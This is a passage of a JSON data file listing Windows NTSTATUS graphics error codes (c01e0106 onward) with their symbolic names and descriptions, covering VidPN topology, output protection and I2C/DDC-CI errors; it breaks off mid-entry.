\"description\": \"A problem could not be solved due to an existing condition. Try again now.\"\n        },\n        \"c01e0106\": {\n            \"code\": \"STATUS_GRAPHICS_ALLOCATION_INVALID\",\n            \"description\": \"The allocation is invalid.\"\n        },\n        \"c01e0107\": {\n            \"code\": \"STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE\",\n            \"description\": \"No more unswizzling apertures are currently available.\"\n        },\n        \"c01e0108\": {\n            \"code\": \"STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED\",\n            \"description\": \"The current allocation cannot be unswizzled by an aperture.\"\n        },\n        \"c01e0109\": {\n            \"code\": \"STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION\",\n            \"description\": \"The request failed because a pinned allocation cannot be evicted.\"\n        },\n        \"c01e0110\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE\",\n            \"description\": \"The allocation cannot be used from its current segment location for the specified operation.\"\n        },\n        \"c01e0111\": {\n            \"code\": \"STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION\",\n            \"description\": \"A locked allocation cannot be used in the current command buffer.\"\n        },\n        \"c01e0112\": {\n            \"code\": \"STATUS_GRAPHICS_ALLOCATION_CLOSED\",\n            \"description\": \"The allocation being referenced has been closed permanently.\"\n        },\n        \"c01e0113\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE\",\n            \"description\": \"An invalid allocation instance is being referenced.\"\n        },\n        \"c01e0114\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE\",\n            \"description\": \"An invalid allocation handle is being referenced.\"\n        },\n        \"c01e0115\": {\n            \"code\": \"STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE\",\n            \"description\": \"The allocation being referenced does not belong to the current device.\"\n        },\n        \"c01e0116\": {\n            \"code\": \"STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST\",\n            \"description\": \"The specified allocation lost its content.\"\n        },\n        \"c01e0200\": {\n            \"code\": \"STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE\",\n            \"description\": \"A GPU exception was detected on the given device. The device cannot be scheduled.\"\n        },\n        \"c01e0300\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY\",\n            \"description\": \"The specified VidPN topology is invalid.\"\n        },\n        \"c01e0301\": {\n            \"code\": \"STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED\",\n            \"description\": \"The specified VidPN topology is valid but is not supported by this model of the display adapter.\"\n        },\n        \"c01e0302\": {\n            \"code\": \"STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED\",\n            \"description\": \"The specified VidPN topology is valid but is not currently supported by the display adapter due to allocation of its resources.\"\n        },\n        \"c01e0303\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VIDPN\",\n            \"description\": \"The specified VidPN handle is invalid.\"\n        },\n        \"c01e0304\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE\",\n            \"description\": \"The specified video present source is invalid.\"\n        },\n        \"c01e0305\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET\",\n            \"description\": \"The specified video present target is invalid.\"\n        },\n        \"c01e0306\": {\n            \"code\": \"STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED\",\n            \"description\": \"The specified VidPN modality is not supported (for example, at least two of the pinned modes are not co-functional).\"\n        },\n        \"c01e0308\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET\",\n            \"description\": \"The specified VidPN source mode set is invalid.\"\n        },\n        \"c01e0309\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET\",\n            \"description\": \"The specified VidPN target mode set is invalid.\"\n        },\n        \"c01e030a\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_FREQUENCY\",\n            \"description\": \"The specified video signal frequency is invalid.\"\n        },\n        \"c01e030b\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_ACTIVE_REGION\",\n            \"description\": \"The specified video signal active region is invalid.\"\n        },\n        \"c01e030c\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_TOTAL_REGION\",\n            \"description\": \"The specified video signal total region is invalid.\"\n        },\n        \"c01e0310\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE\",\n            \"description\": \"The specified video present source mode is invalid.\"\n        },\n        \"c01e0311\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE\",\n            \"description\": \"The specified video present target mode is invalid.\"\n        },\n        \"c01e0312\": {\n            \"code\": \"STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET\",\n            \"description\": \"The pinned mode must remain in the set on the VidPN's co-functional modality enumeration.\"\n        },\n        \"c01e0313\": {\n            \"code\": \"STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY\",\n            \"description\": \"The specified video present path is already in the VidPN's topology.\"\n        },\n        \"c01e0314\": {\n            \"code\": \"STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET\",\n            \"description\": \"The specified mode is already in the mode set.\"\n        },\n        \"c01e0315\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET\",\n            \"description\": \"The specified video present source set is invalid.\"\n        },\n        \"c01e0316\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET\",\n            \"description\": \"The specified video present target set is invalid.\"\n        },\n        \"c01e0317\": {\n            \"code\": \"STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET\",\n            \"description\": \"The specified video present source is already in the video present source set.\"\n        },\n        \"c01e0318\": {\n            \"code\": \"STATUS_GRAPHICS_TARGET_ALREADY_IN_SET\",\n            \"description\": \"The specified video present target is already in the video present target set.\"\n        },\n        \"c01e0319\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH\",\n            \"description\": \"The specified VidPN present path is invalid.\"\n        },\n        \"c01e031a\": {\n            \"code\": \"STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY\",\n            \"description\": \"The miniport has no recommendation for augmenting the specified VidPN's topology.\"\n        },\n        \"c01e031b\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET\",\n            \"description\": \"The specified monitor frequency range set is invalid.\"\n        },\n        \"c01e031c\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE\",\n            \"description\": \"The specified monitor frequency range is invalid.\"\n        },\n        \"c01e031d\": {\n            \"code\": \"STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET\",\n            \"description\": \"The specified frequency range is not in the specified monitor frequency range set.\"\n        },\n        \"c01e031f\": {\n            \"code\": \"STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET\",\n            \"description\": \"The specified frequency range is already in the specified monitor frequency range set.\"\n        },\n        \"c01e0320\": {\n            \"code\": \"STATUS_GRAPHICS_STALE_MODESET\",\n            \"description\": \"The specified mode set is stale. Reacquire the new mode set.\"\n        },\n        \"c01e0321\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET\",\n            \"description\": \"The specified monitor source mode set is invalid.\"\n        },\n        \"c01e0322\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE\",\n            \"description\": \"The specified monitor source mode is invalid.\"\n        },\n        \"c01e0323\": {\n            \"code\": \"STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN\",\n            \"description\": \"The miniport does not have a recommendation regarding the request to provide a functional VidPN given the current display adapter configuration.\"\n        },\n        \"c01e0324\": {\n            \"code\": \"STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE\",\n            \"description\": \"The ID of the specified mode is being used by another mode in the set.\"\n        },\n        \"c01e0325\": {\n            \"code\": \"STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION\",\n            \"description\": \"The system failed to determine a mode that is supported by both the display adapter and the monitor connected to it.\"\n        },\n        \"c01e0326\": {\n            \"code\": \"STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES\",\n            \"description\": \"The number of video present targets must be greater than or equal to the number of video present sources.\"\n        },\n        \"c01e0327\": {\n            \"code\": \"STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY\",\n            \"description\": \"The specified present path is not in the VidPN's topology.\"\n        },\n        \"c01e0328\": {\n            \"code\": \"STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE\",\n            \"description\": \"The display adapter must have at least one video present source.\"\n        },\n        \"c01e0329\": {\n            \"code\": \"STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET\",\n            \"description\": \"The display adapter must have at least one video present target.\"\n        },\n        \"c01e032a\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET\",\n            \"description\": \"The specified monitor descriptor set is invalid.\"\n        },\n        \"c01e032b\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR\",\n            \"description\": \"The specified monitor descriptor is invalid.\"\n        },\n        \"c01e032c\": {\n            \"code\": \"STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET\",\n            \"description\": \"The specified descriptor is not in the specified monitor descriptor set.\"\n        },\n        \"c01e032d\": {\n            \"code\": \"STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET\",\n            \"description\": \"The specified descriptor is already in the specified monitor descriptor set.\"\n        },\n        \"c01e032e\": {\n            \"code\": \"STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE\",\n            \"description\": \"The ID of the specified monitor descriptor is being used by another descriptor in the set.\"\n        },\n        \"c01e032f\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE\",\n            \"description\": \"The specified video present target subset type is invalid.\"\n        },\n        \"c01e0330\": {\n            \"code\": \"STATUS_GRAPHICS_RESOURCES_NOT_RELATED\",\n            \"description\": \"Two or more of the specified resources are not related to each other, as defined by the interface semantics.\"\n        },\n        \"c01e0331\": {\n            \"code\": \"STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE\",\n            \"description\": \"The ID of the specified video present source is being used by another source in the set.\"\n        },\n        \"c01e0332\": {\n            \"code\": \"STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE\",\n            \"description\": \"The ID of the specified video present target is being used by another target in the set.\"\n        },\n        \"c01e0333\": {\n            \"code\": \"STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET\",\n            \"description\": \"The specified VidPN source cannot be used because there is no available VidPN target to connect it to.\"\n        },\n        \"c01e0334\": {\n            \"code\": \"STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER\",\n            \"description\": \"The newly arrived monitor could not be associated with a display adapter.\"\n        },\n        \"c01e0335\": {\n            \"code\": \"STATUS_GRAPHICS_NO_VIDPNMGR\",\n            \"description\": \"The particular display adapter does not have an associated VidPN manager.\"\n        },\n        \"c01e0336\": {\n            \"code\": \"STATUS_GRAPHICS_NO_ACTIVE_VIDPN\",\n            \"description\": \"The VidPN manager of the particular display adapter does not have an active VidPN.\"\n        },\n        \"c01e0337\": {\n            \"code\": \"STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY\",\n            \"description\": \"The specified VidPN topology is stale; obtain the new topology.\"\n        },\n        \"c01e0338\": {\n            \"code\": \"STATUS_GRAPHICS_MONITOR_NOT_CONNECTED\",\n            \"description\": \"No monitor is connected on the specified video present target.\"\n        },\n        \"c01e0339\": {\n            \"code\": \"STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY\",\n            \"description\": \"The specified source is not part of the specified VidPN's topology.\"\n        },\n        \"c01e033a\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE\",\n            \"description\": \"The specified primary surface size is invalid.\"\n        },\n        \"c01e033b\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE\",\n            \"description\": \"The specified visible region size is invalid.\"\n        },\n        \"c01e033c\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_STRIDE\",\n            \"description\": \"The specified stride is invalid.\"\n        },\n        \"c01e033d\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_PIXELFORMAT\",\n            \"description\": \"The specified pixel format is invalid.\"\n        },\n        \"c01e033e\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_COLORBASIS\",\n            \"description\": \"The specified color basis is invalid.\"\n        },\n        \"c01e033f\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE\",\n            \"description\": \"The specified pixel value access mode is invalid.\"\n        },\n        \"c01e0340\": {\n            \"code\": \"STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY\",\n            \"description\": \"The specified target is not part of the specified VidPN's topology.\"\n        },\n        \"c01e0341\": {\n            \"code\": \"STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT\",\n            \"description\": \"Failed to acquire the display mode management interface.\"\n        },\n        \"c01e0342\": {\n            \"code\": \"STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE\",\n            \"description\": \"The specified VidPN source is already owned by a DMM client and cannot be used until that client releases it.\"\n        },\n        \"c01e0343\": {\n            \"code\": \"STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN\",\n            \"description\": \"The specified VidPN is active and cannot be accessed.\"\n        },\n        \"c01e0344\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL\",\n            \"description\": \"The specified VidPN's present path importance ordinal is invalid.\"\n        },\n        \"c01e0345\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION\",\n            \"description\": \"The specified VidPN's present path content geometry transformation is invalid.\"\n        },\n        \"c01e0346\": {\n            \"code\": \"STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED\",\n            \"description\": \"The specified content geometry transformation is not supported on the respective VidPN present path.\"\n        },\n        \"c01e0347\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_GAMMA_RAMP\",\n            \"description\": \"The specified gamma ramp is invalid.\"\n        },\n        \"c01e0348\": {\n            \"code\": \"STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED\",\n            \"description\": \"The specified gamma ramp is not supported on the respective VidPN present path.\"\n        },\n        \"c01e0349\": {\n            \"code\": \"STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED\",\n            \"description\": \"Multisampling is not supported on the respective VidPN present path.\"\n        },\n        \"c01e034a\": {\n            \"code\": \"STATUS_GRAPHICS_MODE_NOT_IN_MODESET\",\n            \"description\": \"The specified mode is not in the specified mode set.\"\n        },\n        \"c01e034d\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON\",\n            \"description\": \"The specified VidPN topology recommendation reason is invalid.\"\n        },\n        \"c01e034e\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE\",\n            \"description\": \"The specified VidPN present path content type is invalid.\"\n        },\n        \"c01e034f\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE\",\n            \"description\": \"The specified VidPN present path copy protection type is invalid.\"\n        },\n        \"c01e0350\": {\n            \"code\": \"STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS\",\n            \"description\": \"Only one unassigned mode set can exist at any one time for a particular VidPN source or target.\"\n        },\n        \"c01e0352\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING\",\n            \"description\": \"The specified scan line ordering type is invalid.\"\n        },\n        \"c01e0353\": {\n            \"code\": \"STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED\",\n            \"description\": \"The topology changes are not allowed for the specified VidPN.\"\n        },\n        \"c01e0354\": {\n            \"code\": \"STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS\",\n            \"description\": \"All available importance ordinals are being used in the specified topology.\"\n        },\n        \"c01e0355\": {\n            \"code\": \"STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT\",\n            \"description\": \"The specified primary surface has a different private-format attribute than the current primary surface.\"\n        },\n        \"c01e0356\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM\",\n            \"description\": \"The specified mode-pruning algorithm is invalid.\"\n        },\n        \"c01e0357\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN\",\n            \"description\": \"The specified monitor-capability origin is invalid.\"\n        },\n        \"c01e0358\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT\",\n            \"description\": \"The specified monitor-frequency range constraint is invalid.\"\n        },\n        \"c01e0359\": {\n            \"code\": \"STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED\",\n            \"description\": \"The maximum supported number of present paths has been reached.\"\n        },\n        \"c01e035a\": {\n            \"code\": \"STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION\",\n            \"description\": \"The miniport requested that augmentation be canceled for the specified source of the specified VidPN's topology.\"\n        },\n        \"c01e035b\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_CLIENT_TYPE\",\n            \"description\": \"The specified client type was not recognized.\"\n        },\n        \"c01e035c\": {\n            \"code\": \"STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET\",\n            \"description\": \"The client VidPN is not set on this adapter (for example, no user mode-initiated mode changes have taken place on this adapter).\"\n        },\n        \"c01e0400\": {\n            \"code\": \"STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED\",\n            \"description\": \"The specified display adapter child device already has an external device connected to it.\"\n        },\n        \"c01e0401\": {\n            \"code\": \"STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED\",\n            \"description\": \"The display adapter child device does not support reporting a descriptor.\"\n        },\n        \"c01e0430\": {\n            \"code\": \"STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER\",\n            \"description\": \"The display adapter is not linked to any other adapters.\"\n        },\n        \"c01e0431\": {\n            \"code\": \"STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED\",\n            \"description\": \"The lead adapter in a linked configuration was not enumerated yet.\"\n        },\n        \"c01e0432\": {\n            \"code\": \"STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED\",\n            \"description\": \"Some chain adapters in a linked configuration have not yet been enumerated.\"\n        },\n        \"c01e0433\": {\n            \"code\": \"STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY\",\n            \"description\": \"The chain of linked adapters is not ready to start because of an unknown failure.\"\n        },\n        \"c01e0434\": {\n            \"code\": \"STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED\",\n            \"description\": \"An attempt was made to start a lead link display adapter when the chain links had not yet started.\"\n        },\n        \"c01e0435\": {\n            \"code\": \"STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON\",\n            \"description\": \"An attempt was made to turn on a lead link display adapter when the chain links were turned off.\"\n        },\n        \"c01e0436\": {\n            \"code\": \"STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE\",\n            \"description\": \"The adapter link was found in an inconsistent state. Not all adapters are in an expected PNP/power state.\"\n        },\n        \"c01e0438\": {\n            \"code\": \"STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER\",\n            \"description\": \"The driver trying to start is not the same as the driver for the posted display adapter.\"\n        },\n        \"c01e043b\": {\n            \"code\": \"STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED\",\n            \"description\": \"An operation is being attempted that requires the display adapter to be in a quiescent state.\"\n        },\n        \"c01e0500\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_NOT_SUPPORTED\",\n            \"description\": \"The driver does not support OPM.\"\n        },\n        \"c01e0501\": {\n            \"code\": \"STATUS_GRAPHICS_COPP_NOT_SUPPORTED\",\n            \"description\": \"The driver does not support COPP.\"\n        },\n        \"c01e0502\": {\n            \"code\": \"STATUS_GRAPHICS_UAB_NOT_SUPPORTED\",\n            \"description\": \"The driver does not support UAB.\"\n        },\n        \"c01e0503\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS\",\n            \"description\": \"The specified encrypted parameters are invalid.\"\n        },\n        \"c01e0504\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL\",\n            \"description\": \"An array passed to a function cannot hold all of the data that the function wants to put in it.\"\n        },\n        \"c01e0505\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST\",\n            \"description\": \"The GDI display device passed to this function does not have any active protected outputs.\"\n        },\n        \"c01e0506\": {\n            \"code\": \"STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME\",\n            \"description\": \"The PVP cannot find an actual GDI display device that corresponds to the passed-in GDI display device name.\"\n        },\n        \"c01e0507\": {\n            \"code\": \"STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP\",\n            \"description\": \"This function failed because the GDI display device passed to it was not attached to the Windows desktop.\"\n        },\n        \"c01e0508\": {\n            \"code\": \"STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED\",\n            \"description\": \"The PVP does not support mirroring display devices because they do not have any protected outputs.\"\n        },\n        \"c01e050a\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_INVALID_POINTER\",\n            \"description\": \"The function failed because an invalid pointer parameter was passed to it. A pointer parameter is invalid if it is null, is not correctly aligned, or it points to an invalid address or a kernel mode address.\"\n        },\n        \"c01e050b\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_INTERNAL_ERROR\",\n            \"description\": \"An internal error caused an operation to fail.\"\n        },\n        \"c01e050c\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_INVALID_HANDLE\",\n            \"description\": \"The function failed because the caller passed in an invalid OPM user-mode handle.\"\n        },\n        \"c01e050d\": {\n            \"code\": \"STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE\",\n            \"description\": \"This function failed because the GDI device passed to it did not have any monitors associated with it.\"\n        },\n        \"c01e050e\": {\n            \"code\": \"STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH\",\n            \"description\": \"A certificate could not be returned because the certificate buffer passed to the function was too small.\"\n        },\n        \"c01e050f\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED\",\n            \"description\": \"DxgkDdiOpmCreateProtectedOutput() could not create a protected output because the video present yarget is in spanning mode.\"\n        },\n        \"c01e0510\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED\",\n            \"description\": \"DxgkDdiOpmCreateProtectedOutput() could not create a protected output because the video present target is in theater mode.\"\n        },\n        \"c01e0511\": {\n            \"code\": \"STATUS_GRAPHICS_PVP_HFS_FAILED\",\n            \"description\": \"The function call failed because the display adapter's hardware functionality scan (HFS) failed to validate the graphics hardware.\"\n        },\n        \"c01e0512\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_INVALID_SRM\",\n            \"description\": \"The HDCP SRM passed to this function did not comply with section 5 of the HDCP 1.1 specification.\"\n        },\n        \"c01e0513\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP\",\n            \"description\": \"The protected output cannot enable the HDCP system because it does not support it.\"\n        },\n        \"c01e0514\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP\",\n            \"description\": \"The protected output cannot enable analog copy protection because it does not support it.\"\n        },\n        \"c01e0515\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA\",\n            \"description\": \"The protected output cannot enable the CGMS-A protection technology because it does not support it.\"\n        },\n        \"c01e0516\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET\",\n            \"description\": \"DxgkDdiOPMGetInformation() cannot return the version of the SRM being used because the application never successfully passed an SRM to the protected output.\"\n        },\n        \"c01e0517\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH\",\n            \"description\": \"DxgkDdiOPMConfigureProtectedOutput() cannot enable the specified output protection technology because the output's screen resolution is too high.\"\n        },\n        \"c01e0518\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE\",\n            \"description\": \"DxgkDdiOPMConfigureProtectedOutput() cannot enable HDCP because other physical outputs are using the display adapter's HDCP hardware.\"\n        },\n        \"c01e051a\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS\",\n            \"description\": \"The operating system asynchronously destroyed this OPM-protected output because the operating system state changed. This error typically occurs because the monitor PDO associated with this protected output was removed or stopped, the protected output's session became a nonconsole session, or the protected output's desktop became inactive.\"\n        },\n        \"c01e051b\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS\",\n            \"description\": \"OPM functions cannot be called when a session is changing its type. Three types of sessions currently exist: console, disconnected, and remote (RDP or ICA).\"\n        },\n        \"c01e051c\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS\",\n            \"description\": \"The DxgkDdiOPMGetCOPPCompatibleInformation, DxgkDdiOPMGetInformation, or DxgkDdiOPMConfigureProtectedOutput function failed. This error is returned only if a protected output has OPM semantics. DxgkDdiOPMGetCOPPCompatibleInformation always returns this error if a protected output has OPM semantics.DxgkDdiOPMGetInformation returns this error code if the caller requested COPP-specific information.DxgkDdiOPMConfigureProtectedOutput returns this error when the caller tries to use a COPP-specific command.\"\n        },\n        \"c01e051d\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST\",\n            \"description\": \"The DxgkDdiOPMGetInformation and DxgkDdiOPMGetCOPPCompatibleInformation functions return this error code if the passed-in sequence number is not the expected sequence number or the passed-in OMAC value is invalid.\"\n        },\n        \"c01e051e\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR\",\n            \"description\": \"The function failed because an unexpected error occurred inside a display driver.\"\n        },\n        \"c01e051f\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS\",\n            \"description\": \"The DxgkDdiOPMGetCOPPCompatibleInformation, DxgkDdiOPMGetInformation, or DxgkDdiOPMConfigureProtectedOutput function failed. This error is returned only if a protected output has COPP semantics. DxgkDdiOPMGetCOPPCompatibleInformation returns this error code if the caller requested OPM-specific information.DxgkDdiOPMGetInformation always returns this error if a protected output has COPP semantics.DxgkDdiOPMConfigureProtectedOutput returns this error when the caller tries to use an OPM-specific command.\"\n        },\n        \"c01e0520\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED\",\n            \"description\": \"The DxgkDdiOPMGetCOPPCompatibleInformation and DxgkDdiOPMConfigureProtectedOutput functions return this error if the display driver does not support the DXGKMDT_OPM_GET_ACP_AND_CGMSA_SIGNALING and DXGKMDT_OPM_SET_ACP_AND_CGMSA_SIGNALING GUIDs.\"\n        },\n        \"c01e0521\": {\n            \"code\": \"STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST\",\n            \"description\": \"The DxgkDdiOPMConfigureProtectedOutput function returns this error code if the passed-in sequence number is not the expected sequence number or the passed-in OMAC value is invalid.\"\n        },\n        \"c01e0580\": {\n            \"code\": \"STATUS_GRAPHICS_I2C_NOT_SUPPORTED\",\n            \"description\": \"The monitor connected to the specified video output does not have an I2C bus.\"\n        },\n        \"c01e0581\": {\n            \"code\": \"STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST\",\n            \"description\": \"No device on the I2C bus has the specified address.\"\n        },\n        \"c01e0582\": {\n            \"code\": \"STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA\",\n            \"description\": \"An error occurred while transmitting data to the device on the I2C bus.\"\n        },\n        \"c01e0583\": {\n            \"code\": \"STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA\",\n            \"description\": \"An error occurred while receiving data from the device on the I2C bus.\"\n        },\n        \"c01e0584\": {\n            \"code\": \"STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED\",\n            \"description\": \"The monitor does not support the specified VCP code.\"\n        },\n        \"c01e0585\": {\n            \"code\": \"STATUS_GRAPHICS_DDCCI_INVALID_DATA\",\n            \"description\": \"The data received from the monitor is invalid.\"\n        },\n        \"c01e0586\": {\n            \"code\": \"STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE\",\n            \"description\": \"A function call failed because a monitor returned an invalid timing status byte when the operating system used the DDC/CI get timing report and timing message command to get a timing report from a 